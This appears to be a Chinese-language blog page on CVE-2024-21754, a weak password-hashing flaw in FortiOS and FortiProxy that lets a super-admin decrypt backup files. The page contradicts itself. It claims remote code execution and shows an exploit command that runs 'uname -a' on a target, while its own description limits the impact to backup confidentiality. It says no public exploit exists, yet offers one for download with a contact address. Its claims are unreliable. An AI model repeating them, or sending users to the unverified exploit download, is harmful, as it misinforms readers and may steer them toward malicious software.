Fortinet FortiProxy密码哈希计算强度不足漏洞分析与利用(CVE-2024-21754)

本文详细分析了Fortinet FortiOS和FortiProxy中存在的密码哈希计算强度不足漏洞(CVE-2024-21754),该漏洞允许具有超级管理员权限的攻击者解密备份文件,涉及多个版本的系统安全风险。

FortiOS和FortiProxy密码哈希漏洞导致远程代码执行(CVE-2024-21754)

概述

在FortiOS和FortiProxy版本7.4.3、7.2、7.0、6.4和2.0中发现了一个被归类为CVE-2024-21754的关键漏洞。该漏洞属于CWE-916类别,涉及使用计算强度不足的密码哈希,可能允许具有超级管理员配置文件和CLI访问权限的特权攻击者解密备份文件。

详细信息

  • CVE ID: CVE-2024-21754
  • 发现时间: 2024年4月27日
  • 发布时间: 2024年6月27日
  • 影响: 机密性
  • 漏洞利用可用性: 未公开,仅私有

漏洞描述

该漏洞存在于FortiOS和FortiProxy使用的密码哈希机制中。受影响版本中使用的哈希算法提供的计算强度不足,使其容易受到暴力攻击。具有超级管理员权限和CLI访问权限的攻击者可以利用此弱点解密包含敏感信息的备份文件。

受影响版本

FortiOS:

  • 7.4.3及以下版本
  • 7.2所有版本
  • 7.0所有版本
  • 6.4所有版本

FortiProxy:

  • 7.4.2及以下版本
  • 7.2所有版本
  • 7.0所有版本
  • 2.0所有版本

运行方法

要运行漏洞利用,您需要Python 3.9。 执行:

1
python exploit.py -h 10.10.10.10 -c 'uname -a'

联系方式

如有疑问,请联系 hacktidexp@fortiexp.in

漏洞利用:

点击此处下载

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计